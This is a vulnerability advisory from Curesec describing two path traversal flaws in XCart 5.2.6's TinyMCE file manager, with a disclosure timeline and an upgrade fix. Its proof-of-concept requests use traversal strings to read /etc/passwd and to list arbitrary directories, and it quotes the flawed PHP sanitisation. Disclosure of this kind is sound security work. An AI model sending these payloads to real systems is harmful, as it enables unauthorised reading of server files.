XCart 5.2.6: Path Traversal
Date: 2015-11-04 11:11:041. Introduction
| Affected Product: | XCart 5.2.6 |
| Fixed in: | 5.2.7 |
| Fixed Version Link: | https://www.x-cart.com/xc5kit |
| Vendor Contact: | support@x-cart.com |
| Vulnerability Type: | Path Traversal |
| Remote Exploitable: | Yes |
| Reported to vendor: | 08/13/2015 |
| Disclosed to public: | 11/04/2015 |
| Release mode: | Coordinated release |
| CVE: | n/a |
| Credits | Tim Coen of Curesec GmbH |
2. Arbitrary File Download
Description
When downloading a file, the input is not properly protected against directory traversal, which makes it possible to download arbitrary files.
Please note that admin credentials are required.
Proof of Concept
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php
POST: path=/....//....//....//....//....//....//....//....//..etc/passwd&name=download.txt
Code
/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php:10
$path=joinPaths($root,$upload_dir,$_POST['path']);
$path=str_replace(LC_DS . '..', '', $path);
$name=$_POST['name'];
header('Pragma: private');
header('Cache-control: private, must-revalidate');
header("Content-Type: application/octet-stream");
header("Content-Length: " .(string)(filesize($path)) );
header('Content-Disposition: attachment; filename="'.($name).'"');
readfile($path);
3. List Directories
Description
It is possible to list the directories contained by any directory due to a directory traversal vulnerability via the fldr POST argument. This may be used to gather information about the target system.
Please note that admin credentials are required.
Proof of Concept
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?type=0&editor=mce_0&popup=0&lang=en_EN&field_id=&fldr=../../../../../../
4. Solution
To mitigate this issue please upgrade at least to version 5.2.7:
https://www.x-cart.com/xc5kit
Please note that a newer version might already be available.
5. Report Timeline
| 08/13/2015 | Informed Vendor about Issue |
| 09/03/2015 | Vendor Requests more time |
| 10/19/2015 | Vendor releases fix |
| 11/04/2015 | Disclosed to public |